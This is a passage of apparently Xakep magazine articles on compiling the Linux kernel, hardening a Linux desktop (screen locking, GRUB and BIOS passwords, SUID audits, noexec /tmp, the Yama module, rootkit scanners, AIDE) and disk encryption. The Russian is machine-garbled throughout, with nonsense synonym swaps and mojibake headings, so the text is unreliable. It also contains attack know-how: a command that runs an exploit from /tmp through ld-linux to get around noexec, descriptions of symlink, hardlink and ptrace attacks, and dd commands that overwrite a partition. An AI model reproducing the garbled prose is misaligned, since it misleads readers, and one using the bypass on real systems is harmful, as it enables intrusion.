отвечено no/yes. • make xconfig — графичный интерфейс держи базе QT. Но ваш покорнейший слуга спокон века придерживаюсь нескольких простых правил: • Все. которых никак не было во старом конфиге. • make gconfig — графичный интерфейс бери базе GTK. сколько ми как следует понадобится (в волюм числе содействие ФС. • make defconfig — конфиг вместе с настройками сообразно умолчанию. у кого вагон свободного времени.

Ставим то. Для использования ccache близ сборке ядра набирай $ make CC="ccache gcc" CXX="ccache g++" Весь кэш довольно содержаться на каталоге ~/. Openwall. В результате повторная пересборка проходит несравненно быстрее. В таком случае на помощь придет ccache. Для того. равно загнать получилось далеко не для целое заслуживающие внимания патчи.z XÀÊÅÐ 00 /141/ 00 .deb (бинарник да модули ядра) да linux-headersversion-revision. что да на способе выше. DEBIAN-WAY Выше моя персона описал способ. что-то капельку ускорит компиляцию получи многоядерном процессоре. дозволяется вышагивать на ребут. Ядро может без труда неграмотный намылиться или работать невыгодный стабильно. Но почти что умереть и безвыгодный встать всех дистрах очищать частный путь. А новая сборка. Также недурственный заключительный точкой может сделаться конфиг дистрибутивного ядра.ccache. После компиляции начинается установка: $ sudo make modules_install $ sudo make install На самом деле модули легко скопируются на /lib/modules/. В зависимости от мощности компа равным образом опций конфигурации. а статистику до его использованию позволено отнестись со через команды $ ccache -s 090 $ sudo update-initramfs -k v2. чтобы воспользоваться make-kpkg. может бытийствовать возмущенно долгой. кондуит неграмотный резиновый. умудряющийся кэшировать результаты компиляции. да пошлепали возьми перезагрузку: $ sudo dpkg -i /usr/src/*. установим одиночный пакет: $ sudo apt-get install kernel-package Генерация конфига происходит определённо этак же. в духе конфиг подшофе (и сохранен во обложка .deb (заголовочные файлы ядра).UNIXOID Статистика объединение латентности • Опции из пометкой EXPERIMENTAL паче малограмотный охватывать лишенный чего крайней получай ведь необходимости. а тоже общностный разряд патчсетов — дистрибутивные (ведь весть небольшое наличность дистрибутивов использует ванильное ядро). а сборка порядочно иначе: $ fakeroot make-kpkg --initrd --revision=mykernel \ kernel_image kernel_headers modules_image Эта первенство спервоначала соберет ядро. а основа с конфигом — на /boot. сердцевина может сходиться по часу да пусть даже больше. Создаем initrd пользу кого нашего нового ядра: Òóðáî-êîìïèëÿöèÿ Далеко отнюдь не вечно стало не без; первого раза сосредоточить безупречно работающее косточка — кровь из носу забудешь запустить тот или другой модуль или взбутетенить только патч. За бортом остались OpenVZ равно Xen. скрестив щупальцы равным образом затаив дыхание.6.config). которые будут покоиться во / usr/src. добавляю аффикс версии ядра в General Setup Æ Local Version. В Debian/Ubuntu из-за сборку ядра отвечает make-kpkg. который получилось. некоторый позволено подумаешь установить сиречь удалить штатным пакетным менеджером. можно починать для сборке: $ make С через опции «-j» допускается обозначить доля потоков. а затем создаст двушничек пакета: linuximage-version-revision. КОМПИЛЯЦИЯ. которым допускается сконцентрировать сердечник во любом дистрибутиве. • Чтобы безграмотный совершать ошибки на ядрах. Также невыгодный рекомендуется подключать Device Drivers Æ Staging Drivers. особенно держи маломощном компе. дающий те либо — либо некоторые люди «плюшки». самая большая изо которых — снятие на выходе пакета не без; ядром. загрузиться вместе с новым ядром. После того.34-zen1 -c Обновляем конфигурацию grub.deb $ sudo reboot MAKE COMPLETE К сожалению. воеже симпатия эврика новое ядро: $ sudo update-grub Все.

.

ОТ МАШИНЫ РУКИ ПРОЧЬ! Методы защиты ото физического проникновения нате твою машину до смерти просты. Постоянный аудирование кода. неграмотный всё-таки изо них чисты получи руку.1%. как бы их придумать. Правило первое: издревле блокируй экран (в большинстве сред <Ctrl+Alt+L>). включая пароли. Интернет полный придурков. Во избежание их безнаказанности необходимо использовать пятую (и окончательную) линию обороны под названием аудитинг.com Ïëþñ 000 ê çàùèòå Êðóãîâàÿ îáîðîíà Linux-äåñêòîïà Открытые UNIX-системы вечно славились своей безопасностью. пупсик» (хотя первые неудовлетворительно представителя тройки это. Взломав машину. В рамках одной статьи наш брат далеко не сможем овладеть их все. Во-вторых. 2. Никто с нас не хочет хлебнуть посредством край взлому со стороны одного изо них (или всех сразу).UNIXOID Евгений Зобнин zobni не оставив задним числом себя невыгодный токмо нежного «Тебя поимели. скорешенько всего. Четвертая шеренга обороны — проверка системы бери существование руткитов равным образом прочей дряни. Достаточно передать себя в месте подлеца. что да через кого будем защищать: 1. я можем отправить в рот подогнуть пароль. маячащей черт-те где на бок света по-за 0. взломав чужую машину. те самые придурки. которому дозволительно вверить хранение даже самой конфиденциальной информации. кажинный происшествие установки ОС уникален и требует подкручивания винтиков. сертификаты. кул-хацкеров и просто-напросто любопытных людей. Безопасность механизмы — суждение весьма многогранное. сделают). Человек — тварь общественно-зависимое. грамотно организовав защиту каждого с которых. некоторый в будущем будут пустить в ход чтобы регулярного обновления своего архива твоими данными. Это равно снедать пяточек основных рубежей. но да логов да другого доказательства своей вины да контактных данных. которые ты да я стащили. 3. ПКЛ (придурки. Правило второе: используй сложные и надежные пароли (о том. мы можем нетрудно удлинить работу из системой. произведение — везде и ввек пишущий сии строки находимся на обществе других людей. кукисы и архивы баз данных. они по сию пору равно захотят ускользнуть во исключительно английской манере. Дом. каковой через каждое слово иногда равен комбинациям может статься «qwerty» тож «123». луг учебы. хорошо продуманная поведение разграничения прав доступа — всегда сие сделало их очень привлекательным продуктом. XÀÊÅÐ 00 /141/ 00 . Во-первых. Даже неравно ПКЛ невыгодный засунут во область машины свой бэкдор иначе DOS-бота. благодаря тому что во вкусе многие даже если отнюдь не удосуживаются спутать планы отражатель в период своего ухода. бескорыстны и холодны для чужим секретам. поставка защиты с физического доступа ко машине во эпоха нашего отсутствия. Поэтому третья линия обороны — оборона конфиденциальных данных с посторонних око вместе с помощью сокрытия информации alias шифрования. Поэтому вторая ряд обороны — сие щит сетевых рубежей с вторжения. на разных людей оно может иметь всё неравные значения. ты сведешь шанс бытовуха ь поломанным к цифре. В кому лишь не лень сфере жизни нас окружают люди. натурально же. любопытные) захотят оставить на твоей машине агатовый ход. кулхацкеры. кулхацкеры да прямо любопытные люд захотят 092 получить приступ ко нашим важным данным. в чем дело? да мы от тобой можем полностью положиться держи разработчиков равным образом невыгодный должны «допиливать» свою систему самостоятельно? Нет. Поэтому первая линия обороны — это. 4. 5. благодаря тому начинать вмиг определимся со тем. молниеносные выходы багфиксов. Но итак ли это. а вдобавок ради рассылки спама другими словами проведения DDoS. Получив желаемое. и все становится как никогда ясно.

conf. своевременные обновления дистрибутива да считка моей статьи «Огненная дуга». не мудрствуя лукаво вынув батарейку для несколько секунд. учредить во качестве первого загрузочного устройства CD-ROM равно загрузиться не без; LiveCD. азбучный апдейт софта придется производить руками. Последнее правило.d/10periodic: $ sudo vi /etc/apt/apt. Самое простое. Такие дистрибутивы. подсунутый взломщиком (мы безвыгодный единовременно писали об настройке популярных расширений безопасности пользу кого ОС Linux. Но сие нас далеко не остановит: мы снимем крышку из корпуса равно сбросим настройки CMOS вместе со паролем. Увидев. принимать единаче одна рекомендация. Правило третье: установи отзыв бери GRUB (об этом кайфовый врезке). Это удобно. используй правильные браузеры свежей версии. хацкер может попробовать подсовать тебе троян по-под видом легальной программы тож воспользоваться дыру во браузере. • Поиск suid/ sgid-файлов с несколькими ссылками: $ find / -type f \ ( -perm -004000 -o -perm -002000 \) -links +1 -ls 093 . взломщик может подвергнуть проверке сопроводить DoS/DDoS.d/10periodic APT::Periodic::Enable "1". Увидев замок бери корпусе. который пролезает возьми машину жертвы с Сети. Кстати. который сие относится только лишь ко обновлениям безопасности.conf. подними картотека ][). мы можем уложиться во листок BIOS. Большинство изо них имеют переднюю крышку. воспользуйся утилитой APG. посвященной правильной настройке брандмауэра (см. Но соединение никак не сработает. Хорошей практикой на борьбе со дырами является регулирование автоXÀÊÅÐ 00 /141/ 00 Даже во современном дистрибутиве Tiger находит во всем известные проблемы безопасности матического обновления ОС. В этом случае целое просто: ставь софт с официальных репозиториев дистрибутива. ][ ото 06. которая также обеспечивает некоторую защиту CD-привода. очевидно же. неравно будешь ребята! рекомендациям. с тем режим сама производила обновления на фоне. безвыгодный спасешься. связанная вместе с запираемыми получай крепость системниками. В Ubuntu сие делается при помощи графический интерфейс (System Æ Administration Æ Software Sources Æ Updates Æ Automatic updates. APT::Periodic::Unattended-Upgrade "1". INFO info • Если вместе с придумыванием сложных паролей туго. шутка. обычно используют небольшую толику простых да проверенных приемов. Правило шестое: всегда пристегивай системник ко батарее из помощью цепи. а бурно надоедает: гораздо эффективнее произвести так. Install security updates without confirmation) другими словами со через модификации файла /etc/apt/apt. отнюдь не отвлекая пользователя с работы. Обломавшись получи этом пути. Правило четвертое: настрой загрузку лишь только со жесткого диска да поставь лозунг бери BIOS. От возможных дыр во софте и адски эффективны такие системы. а гляди небольшую волну весь сможешь выдержать. USB-разъемов равно кнопок включения/сброса. закомментировать строку «ca::ctrlaltdel:/sbin/shutdown -t3 -r now» равным образом выполнить команду «/sbin/init q». Правило пятое: покупай оболочка из замком. автор сих строк забираем полный системник от на лицо и разбираем его получай ближайшей свалке. От хорошей распределенной атаки ты. вроде SELinux либо — либо AppArmor (уже интегрированные во Ubuntu. но более того вполне читаемый пароль. которые время с времени выскакивают изо трея да сообщают об очередном обновлении. Однако мы всегда можем пригрести ко рукам <Ctrl+Alt+Del> получи клавиатуре для перезагрузки машины. OpenSuSE. APT::Periodic::Update-Package-Lists "1". Fedora. OpenSuSE равным образом Fedora). описанным в статье «Устоять все непропорционально кто ценой» (][ через 09.2010). Замечу.2009). как бы Ubuntu. а да во ней есть доля правды: коэффициент полезного действия защиты с физического доступа падает непосредственно складно росту наглости взломщика. Мы можем перезагрузить компьютер равно из через GRUB погрузить ОС во однопользовательском режиме. Поняв бесплодность своих попыток проникновения. В борьбе с такими экземплярами фауны кул-хацкеров поможет размыкание ненужных демонов. аюшки? GRUB запаролен. если растворить обложка /etc/inittab. правильнее всего. которые просто отнюдь не позволят уязвимому сервису исполнить код. уж имеют в своем составе графические напоминалки.Настраиваем автообновление читай во боковом выносе INFO). вследствие которому система всегда довольно лишаться во свежайшем состоянии. получив законченный обследование над системой. УГРОЗА ИЗВНЕ Те. APT::Periodic::Download-UpgradeablePackages "1". APT::Periodic::AutocleanInterval "5". сколько может учинить злоумышленник — просканировать твою машину сверху открытые штаны и попытаться откопать незащищенный тенетный сервис. получив безраздельный проход для содержимому жесткого диска. которая поможет сгенерировать весьма сложный.

so.so» моментально после строки «auth sufficient pam_rootok.noexec.so». взломщик попытается переполнить в твою машину эксплойт. Чтобы приказать зацитировать домашние данные какие-либо важные системные утилиты да таким образом привести их во желаемое состояние. Zeppoo — ïîèñê ðóòêèòîâ íà óðîâíå ÿäðà Zeppoo позволяет откопать Linux руткиты. так со SUID-софтом целое маленечко сложнее. Потерпев неудачу во получении прав root обычными методами.nodev). Но беспричинно в качестве кого его права усиленно ограничены. достаточно выплеснуть сии каталоги для отдельные разделы да подключить с опциями noexec (а на верности равным образом nosuid. медвежатник может выкопать открытые для всеобщей журнал файлы равным образом всадить во них какой-либо адрес (например. Он производит просмотр конфигурационных файлов. Вотан с способов преодолеть во систему находится во области человеческой безалаберности. 2. man на помощь. взлома допускается несложно избежать. 3. Теперь власть истощить su будет лишь только у пользователей.d/su строку «auth required pam_wheel.UNIXOID Tiger приступил ко анализу системы Список SUID-софта во современном Linux всерьёз очень велик СВОЙ ЛИЧНЫЙ БАСТИОН После проникновения на машину после ранимый услуги взломщик скорее общей сложности хорош заключать архи ограниченные компетенция да потенциал (почти целое сетевые сервисы на UNIX работают ото какого-либо специального пользователя. Даже когда во одной изо них хорошенького понемножку найдена уязвимость. возлюбленный сможет отправить его мероприятие сумме во две стороны: опора ОС alias программы. имеющие SUID-бит. что-нибудь лозунг root окажется пустым сиречь настоль простым. добавить на опции сетевого сервиса осуществимость входа вне пароля XÀÊÅÐ 00 /141/ 00 . корневой каталог веб-сервера сиречь FTP-сервера). если устройство окажется полностью в чужих руках. Для сего получай меню SUID-софта вместе с через find: $ sudo find / -type f \( -perm -04000 -o \ -perm -02000 \) \-exec ls {} \. безграмотный имеющего серьезных полномочий в системе). состоящих во группе wheel (естественно. скрытые процессы равно сетевые соединения. на стандартном ядре Linux защиты с данного вида атак нет. 094 права root"а путем локальные дыры на безопасности. ты можешь обрушить всю систему. Но малограмотный однако таково просто-напросто — грамотный личность запустит программу от через динамического линковщика да мелочёвка обойдет данное ограничение: $ /lib/ld-linux. попросту сняв SUID-бит со программы. чтоб добыть Ïàðîëü íà GRUB Для установки пароля возьми GRUB должен изготовить двум вещи: 1.conf равно прирастить на него опцию «password --md5 хеш-пароля». однако возлюбленная лакомиться во патче RSBAC (www. Если каким-либо образом взломщику удастся обогнать проблему запуска эксплойта. потому-то первое.org). равным образом методы защиты через них. кто на любом случае рекомендуется для установке. бинарных файлов да файлов данных. новые системные вызовы равно многое другое.nodev 0 0 Так кракер безграмотный сможет облечь плотью и кровью собственный эксплойт во указанном каталоге. файловых систем. Защититься хватит просто. Но кабы не без; ядром все прямо (уязвимость либо есть. Tiger — àíàëèçàòîð ëîêàëüíîé áåçîïàñíîñòè Tiger — сие пакет.net/ projects/zeppoo. Наша теорема — употребить всё-таки силы с целью того. 2. В своей работе использует chkrootkit да John the ripper. ты приходится себя во нее добавить). Открыть обложка /boot/grub/grub. который некто попытается изготовить — повысить свои компетенция по root. значащийся с коллекции shell-скриптов. не мудрствуя лукаво добавив в файл /etc/pam. спирт сможет пускать в ход просто-напросто несколько мест с целью заливки вредоносного кода: публичный библиография /tmp и кулуарный библиография взломанного сервиса (например. А в рассуждении сего лиши кое-кто изо программ привилегий исполнения с правами root: $ sudo chmod a-s /ïóòü/ê/áèíàðíèêó Будь осторожным — оставив минуя прав важные системные программы. Например: /dev/sda5 /tmp ext2 nosuid. Только сии два компонента ОС могут отдать ему сокровенный root-доступ. Как всегда. Запустить команду /sbin/grub равным образом накопить во ее интерактивной оболочке команду md5crypt. Мы обезопасим систему. Первым делом хацкер попытается претворить команду su на надежде на то. 4. чтобы не допустить ему сие сделать.2 /tmp/exploit К сожалению. Исходный адрес доступен держи сайте проекта: http://sourceforge. используя прямой путь для памяти ядра не без; через файлов /dev/kmem равно /dev/ mem. используемый на поиска проблем безопасности UNIX-систем. что он сможет его подобрать. Ниже ты да я рассмотрим типичные замашки злоумышленников. После сего список запросит фраза равным образом выведет на отражатель его md5-хеш. конфигурационных файлов пользователя и генерирует отчеты.rsbac. направленные нате сбор root. 1. либо ее нет).

кой сорвет плеть утилите. Кроме сетевых сервисов безграмотный исключена вероятность подцепить заразу торчмя чрез дыру во веб-браузере иначе говоря каком-нибудь pidgin. равно твоя милость получишь заплатку во виде баг-фикс 095 . Некоторые приложения создают вот сезон своей работы символьные ссылки. однако на правах обезопасить себя на томик случае. ИСТРЕБЛЯЕМ НЕЧИСТЬ Что ж. создаваемые на домашнем каталоге пользователя. ты да я защитили систему на взгляд равно внутри. Потерпев срыв во борьбе вслед за власть суперпользователя. маршрутизация. Третье — личные информация пользователей. вызвавшего ptrace. В большинстве дистрибутивов файлы. В некоторых ситуациях бандит может сменить эту ссылку. созданным во таких каталогах. круглым счетом как бы релегация хорош заключать те а карт-бланш доступа. что-то рядом взломе одного изо пользовательских приложений громила сможет раскрыть состояние равным образом конфиденциальную информацию другого приложения этого пользователя.д. дозволено хорош исключительно на том случае. например. • Атака вместе с использованием жестких ссылок. Yama по части умолчанию включен во дистрибутив Ubuntu равно позволяет защитить систему через некоторых видов локальных атак: • Атака вследствие подстановку символьной ссылки на общедоступном каталоге. Даже неравно твои пароли будут зашифрованы. фундаментально безопасная домашняя власть отнюдь не должна иметь для своем борту никаких сетевых сервисов. равным образом UID владельца ссылки совпадают. например). далеко не является проблемой. в силу того что что-нибудь кракер окажется на сейчас расшифрованном разделе). воспользуйся системой виртуализации уровня ОС. Если такое произойдет — пиши пропало. неграмотный имеющим доступа ко оригинальному файлу. Второе — это данные что до самом сервере. Yama разрешает пускать в дело комплексный вызов ptrace только лишь про отладки процессов-потомков. поэтому даже безграмотный имея каких-либо серьезных прав на системе. или страницы веб-сайта. • Атака со использованием системного вызова ptrace. открывающего ссылку. бандит сможет их подчитать (кроме архиважных файлов из паролями различных программ.profile: umask 077 Теперь всегда опять-таки создаваемые файлы пользователя будут защищены от посторонних глаз. никак не имеющим посещение ко оригинальному файлу. Само соответственно себя создание жестких ссылок пользователем. их сотни). rkhunter вдобавок ищет известные руткиты Единственное. остаются видимыми во всех отношениях все подряд (маска 022). Yama запрещает создание жестких ссылок пользователям. Чтобы избежать такого типа ситуации. Однако вследствие образование жесткой ссылки бандит может подсунуть начальный обложка другому привилегированному приложению и отворить содержащиеся во нем данные. прочитавшей ее). на каталоге /tmp тож /var/tmp. Хорошей идеей довольно набор модуля Linux-ядра Yama (http://lkml. если бы UID отлаживаемого процесса равен UID. аюшки? позволительно отрекомендовать с целью защиты ото такой ситуации — содержать весь конфиденциальные способности бери виртуальном разделе равным образом отсоединять его для системе всего лишь за мере необходимости (полное криптооперация /home отнюдь не спасет. а когда уже припрет выложить на локальную козни личный файловый картотека или — или сайт. даже если всё-таки сие далеко не поможет. Даже маломальски цивилизованный хацкер изумительно понимает. положить их получи и распишись свою машину равным образом броузить всемирная паутина через твоего имени. Это может возбудить ко тому. довольно встретить весь общедоступные файлы равным образом стащить двоичный знак ежедневник интересах всех: # find /dir -xdev -type d \( -perm -0002 -a \ ! -perm -1000 \) -print 5. записанная во файл ~/. org/lkml/2010/6/23/25).Вывод rkhunter паче приятен глазу… или зачислить на обложка код. ни одна душа отнюдь не помешает хацкеру унести однако настройки того а Firefox. В первую караван сие касается данных взломанного сервиса. файлов. Вообще. заставив программу обратиться для поддельному файлу. включая пароли. Обычно их в свою очередь до черта сохранить в тайне вне нарушения работоспособности системы. XÀÊÅÐ 00 /141/ 00 Кроме обычных проверок. таковой в качестве кого FreeBSD Jail сиречь Linux VServer (обе они поуже были во всех подробностях описаны нате страницах журнала). равным образом отверточник таки проникнет на систему? Попробуем разобраться. если бы UID процесса. личную переписку да всю прочую конфиденциальщину (о методах получения root во этом случае я не насчет частностей молчу. ближайшие механизмы да т. которые быть создании защищают обложка с посторонних). взломщик попытается докопаться сильнее информации в отношении системе равно утащить важные данные. что вследствие сейчас использованную дыру во безопасности некто безграмотный сможет ходить бессменно (если сие еще опубликованная уязвимость. сохраненные браузером. В борьбе со сим поможет одна коротенькая строчка. По умолчанию произвольный судебное дело может привести в исполнение отладку другого процесса с через ptrace. ее исправят буквально посредством час-два. Взломщик унесет все. созданного разработчиками изо Canonical. не считая отнюдь важных да необходимых (OpenSSH. Фактически спастись через сего не возбраняется только вовремя распознав атаку да запретив по сию пору подключения не без; помощью файера (либо прямо вытащив электролиния с сеточный карты). выложенных для FTP-сервер. После установки Yama следовать по ссылкам.

В частности. Единственная опция. называемых HIDS (Локальные системы обнаружения вторжений). иначе бота. поэтому. потому используют стандартные утилиты командной строки (awk. Если ты далеко не ручаюсь на целостности сих утилит.) базу придется пересоздавать. Как да Tripwire. файлах доступа. в чем дело? на одном с ближайших номеров симпатия будет опубликована. …) в целях выполнения проверок. неравно а сие неизвестная сообществу дыра. доступных на UNIX-системах. воспользуемся командой aideinit: $ sudo aideinit После окончания ее работы на каталоге /var/lib/aide склифосовский создана новая база вместе с именем aide.db.db* /usr/bin/aide \ /etc/aide/aide. быстрее всего. Такова литоринх репрессия после гарантию безопасности. Однако это не имеет никакого значения. Если бандит сможет модифицировать системные файлы пользу кого установки бэкдора. бери до предуказанный e-mail отправляется письмо с предупреждением равно деталями изменения. трояны.d. Одна с самых популярных HIDS. кто позволит без участия всяких проблем ходить получи твою машину. На деле сие выглядит снова проще: около первом запуске AIDE создает базу со контрольными суммами всех скольконибудь значимых пользу кого взломщика системных файлов равно периодически сверяет ее богатство из актуальным состоянием системы. помести их известно «чистые» версии получи и распишись флешку равно вызывай программы следующим образом: Конфигурация AIDE располагается во двух конфигурационных файлах: * /etc/default/aide — ãëàâíûé êîíôèãóðàöèîííûé ôàéë * /etc/aide/aide. нате кой будут отправлены весь отчеты об изменениях во файлах (по умолчанию — root). дьявол да сможет переменить да самолично AIDE. И ваш покорнейший слуга надеюсь.new /var/lib/aide/aide.) В нем но задано место хранения базы данных. Второй хранит оглавление правил. что-нибудь ей кризис миновал отдать отдельную статью. поэтому лучший средство использования AIDE заключается во помещении ее на USB-флешку равно ручном запуске во случае необходимости (не забыв исправить стезя поиска баз данных во файле aide. Использовать в высшей степени просто: $ sudo chkrootkit $ sudo rkhunter --check На экране появится извещение относительно проверяемых бинарниках. Программы chkrootkit да rkhunter используют базу сигнатур про поиска и обнаружения вредоносного ПО (rkhunter опять же проверяет целостность исполняемых файлов. предназначенный аудиту происходящих на системе действий. db После сего дозволительно принести первую проверку системы: Chkrootkit во действии обновления. Популярные дистрибутивы уже 096 $ sudo chkrootkit -p /media/ôëåøêà $ sudo rkhunter --check --bindir /media/ôëåøêà ВЫВОДЫ При должном терпении образовать подлинно прочную защиту домашней аппаратура малограмотный беспричинно сложно. ась? пелена это доказать. возлюбленный попытается поставить во систему бэкдор. носит имя MAILTO да заключает ячейка электронной почты. пришлось опедерастить целый раздел. отклонение конфигов равно т. рассылающего спам. начиная базы способности равным образом бинарные файлы. следственно наша сестра безвыгодный будем что-либо на них менять. Кроме HIDS общего назначения для того UNIX-систем разработано несколько утилит.д. которую имеет соль изменять. одначе на последнее промежуток времени возлюбленная потеряла близкие позиции в пользу паче открытого аналога почти названием AIDE (Advanced Intrusion Detection Environment — продвинутая строй обнаружения вторжений). позднее каждого намеренного изменения состояния системы (установка пакетов. специализирующихся до невероятности получи и распишись руткитах. произошло вторжение. информация о ней безвременно или — или поздненько всплывет).new.conf.UNIXOID содержат опись необходимых правил. который поодаль безвыгодный безвыездно изо задуманного удалось вселить во статью. Однако никак не нелишне сполна должен нате систему.д. сколько подобный разложение свободно обитать через заблаговременную установку специальных систем. благодаря тому что вроде каждый конспиратор может быть отловлен от разбирательство системы получи и распишись модификации (никакой адрес не может взяться внедрен во ОС возьми любом уровне помимо модификации окружения исполнения). приближенно равно смертельно изощренными.conf.d/* /media/ ôëåøêà Конечно же. выполненными на виде отдельной программы/скрипта. Доступны на любом дистрибутиве. Если что-то изменилось. поэтому проверки будут вытекать любой день. grep. носит имя Tripwire.conf — ïðàâèëà Первый хранит основную конфигурацию AIDE да в большинстве случаев пусть даже неграмотный требует правки.conf --check При установке AIDE помещает себя на каталог заданий cron.conf /etc/aide/aide. cat. Чтобы произвести ее базой согласованного состояния системы. AIDE основана для простом предположении: если какие-то файлы во системе изменились безо предупреждения — значит. Обе программы написаны бери языке shell. контрольные деньги равным образом т. хранящей предыдущее согласованное обстановка системы (/var/lib/aide/aide.д. А главное. внедренными во легальные программы иначе а подключенными ко ядру со через модуля. да аз многогрешный надеюсь. z XÀÊÅÐ 00 /141/ 00 . но это таково обширная тема. загрузочных скриптов равным образом анализирует сетевые интерфейсы в объект прослушиваемых портов). нате основании которых пристало обсуждение состояния системы (права доступа.conf): # cp /var/lib/aide/aide. Чтобы инициализировать новую базу AIDE. проверки получи и распишись известные типы руткитов равным образом т. боты равно целое другие «нелегалы» могут присутствовать как совсем простыми. Бэкдоры. произведем переименование: $ sudo mv /var/lib/aide/aide.db. которые могут являться вынесены в отдельные файлы каталога /etc/aide/aide. даже если невзирая нате то.db). AIDE доступна во виде прекомпилированных пакетов ради любого дистрибутива равно может составлять установлена от через стандартного пакетного менеджера: $ sudo apt-get install aide $ sudo aide -c /etc/aide/aide. Обычно их используют совместно вместе с AIDE про создания дополнительного слоя безопасности.

Реклама .

sourceforge. Драйвер loop-aes отличается простотой реализации. протяжнее LUKS/dm-crypt. EncFS — файловая учение уровня пользователя. опирается возьми стандартную подсистему шифрования носителей. основанная для стандартной подсистеме шифрования Linux-ядра около названием dm-crypt и следующая рекомендациям TKS1/TKS2. 4. LUKS/dm-crypt. предоставляет по-настоящему кроссплатформенное уступка (тома TrueCrypt могут бытийствовать прочитаны в Windows да Mac OS X). потому споры по части том. TrueCrypt. LUKS/dm-crypt доступен на первый встречный Linux-системе.com Øèôðóåì äèñêè ñ ïîìîùüþ LUKS/dm-crypt. третьи сейчас невыгодный стержневой годик занимаются разработкой инновационной программы. приперевший во Linux с мира Windows-систем. появившуюся уже в ядре версии 0. Взглянув держи перечень шифрующего ПО интересах Linux и проанализировав фазис популярности и актуальности каждого с них. ему была посвящена целая дело во одном из предыдущих номеров).UNIXOID Евгений Зобнин zobni LUKS/dm-crypt — общественный порядок шифрования. вплоть до этих пор страдает ото некоторых неисправленных проблем да в меньшей мере производителен.5 равно поддерживающую десятки различных криптоалгоритмов. что именно использовать. показатели делать нечего беречь от посторонних. малограмотный прекращаются по сих пор. а благодаря этому способная работать поверх кто хочешь ФС. loop-aes (http://loop-aes. TrueCrypt è EncFS Каждый с нас хранит получи и распишись жестком диске изрядное количество конфиденциальной информации. Для кого-то сие токмо чуть пароли от различных сетевых сервисов. выполняющая зашифровывание данных на уровне файлов. непревзойденной производительностью равным образом стойкостью ко взлому. на знак ото последнего. Каждая с сих систем имеет близкие достижения да недостатки. 3. В любом случае. за всем тем метод его установки в ёбаный мере нетривиален. да да позволяет производить их зашифровка получи и распишись лету. обладает встроенным графическим интерфейсом да позволяет строить эдак называемые скрытые тамара (невидимые зашифрованные тамара в глубине зашифрованных томов). которая отнюдь не всего лишь подключает устройства равным образом образы на loopback-режиме. TrueCrypt — кроссплатформенная система 098 шифрования жестких дисков равным образом образов вместе с графическим интерфейсом.ko. но. что-то на нашем мобильном мире выработать довольно проблематично помимо использования систем шифрования. EncFS — самое медленное. но.net) — модификация стандартного Linux-драйвера loop. 2. наш брат придем к выводу. что может испугать ажно продвинутых пользователей (мы неграмотный будем трактовать loop-aes. во отличие от loop-aes. зачем вкушать токмо хорошо безопасные и поддерживаемые криптосистемы интересах шифрования жестких дисков да других носителей информации в лету: 1. наиболее XÀÊÅÐ 00 /141/ 00 . от другой стороны. некоторые люди ответственны вслед хранение важной документации.

Благодаря LUKS производители дистрибутивов равно разработчики ПО. хранящиеся в утробе файлов. инкрементальные системы бэкапа будут верно уговаривать файлы. отнюдь не могут иметь жестких ссылок. когда во компутер будет вставлена флешка. оттого громила безвыгодный имеет ни единого шанса узнать какие-либо подробности относительно хранящихся в глубине тома данных. их нуждаться поберечь на укромном месте): $ sudo dd if=/dev/zero of=/dev/sda5 bs=4K Для пущей надежности да запутывания взломщика раздел можно запрудить случайными данными. Например. а для больших дисков — равно целые сутки): INFO info EncFS может работать во Linux.6. равным образом криптографическое API (Crypto API). а для имени файла $ sudo dd if=/dev/random of=/dev/sda5 bs=4K 099 . WARNING warning • В целях безопасности индексацию зашифрованных разделов лучше отключить. по крайней мере. Для получения доступа ко данным безвыездно системы позволяют пускать в дело зашифрованный ключ. влить для нему encfs. по прошествии а флешка довольно безбедно смонтирована. Но перед тем по образу вчинить шифрование. легкоранимый пользу кого этой атаки. получают возможность замонтировать на домашние съестное накопления интересах однозначного определения шифрованных дисков равным образом работы с ними. которая опирается сверху подсистему Device Mapper (dm). их придется загрузить: $ sudo modprobe dm-crypt $ sudo modprobe sha256 $ sudo modprobe aes Чтобы модули загружались умереть и малограмотный встать миг инициализации ОС. В стороне через loop-aes. в любом UNIX. благодаря тому скрытыми с посторонних остаются только лишь самочки данные. однако его быстро можно изменить бери твердый ESSIV. подсистема HAL. работающего не без; дисковыми устройствами. LUKS/DM-CRYPT Система криптозащиты дисков LUKS/dm-crypt. юзер увидит информация от просьбой ввести пароль.assembla. же каста процедура может позаимствовать длительное эпоха (несколько часов. и их имена. Ubuntu) ловко замаскирована почти обычную cryptsetup. хотя наделяет ее несколькими достоинствами: файловая строй может динамически расти. Проект по портированию EncFS во Windows располагается по адресу www. что-нибудь его возбраняется опередить стороной. поэтому.com/spaces/ wencfs. В отличие с своих тяжеловесных собратьев. да таково обаятельно простое равно удобное решение. которая сегодня используется большинством дистрибутивов во качестве прослойки в целях работы вместе с оборудованием. поддерживающем фреймворк fuse. которая во отдельных дистрибутивах (например. что нетрудно догадаться. Поэтому для ее установки шабаш претворить простую команду: $ sudo apt-get install cryptsetup Больше синь порох инсталлировать отнюдь не нужно. твоя милость можешь отсоединить curlftpfs. Mac OS X. зашифрованные EncFS. Если беседовать в рассуждении стойкости шифрования да пригодности для повседневного применения. способную изображать дисковые устройства доброжелатель в друга. иные виртуальные файловые системы также могут существовать зашифрованы (например. LRW иначе XTS). • Файлы. беспричинно как система шифрования привязывает данные не для inode. у первых трех претендентов. отредактировав конфигурационный файл /etc/updatedb. организовать каталог. и по сию пору заливаемые во него эмпирика сохранятся нате сервере в зашифрованном виде).EncFS шифрует отнюдь не только лишь предмет файлов. некоторый описывает дисковый мера в целях зашифрованных данных. теоретически. добавим их имена во обложка /etc/modules: $ sudo -i # echo "dm-crypt\nsha256\naes" >> /etc/modules Далее выбираем атриторный раздел. например. какой хотим подвергнуть шифрованию. FreeBSD и. однако да их имена Создаем новую файловую систему EncFS уязвимое. ведь тогда всё-таки во порядке. LUKS/dm-crypt равным образом TrueCrypt стоит простая равно не без; виду незамысловатая схема EncFS. возлюбленная работает поверх уж существующей файловой системы да поэтому раскрывает злоумышленнику кучу самой разнообразной информации. еще давнёхонько умеет определять LUKS-диски. их владельца равно размер. dm-crypt равным образом всё-таки необходимые криптомодули сделано кушать на дистрибутиве. в свою очередь предоставляемое ядром да предназначенное для выполнения различных криптографических функций. EncFS шифрует и оный и другой файл индивидуально. не без; через которой не грех определить наличие на томе определенных типов файлов (dm-crypt до сих пор использует нагрузка шифрования CBC (Сipher Block Chaining)). Каждая концепция защищена через что-то около называемой Watermark-атаки. Все три системы производят кодирование возьми лету равно находятся вверх файловой системы. да забиваем его нулями (если на разделе есть данные. такие как. conf. состоит изо двух основных компонентов: • dm-crypt — 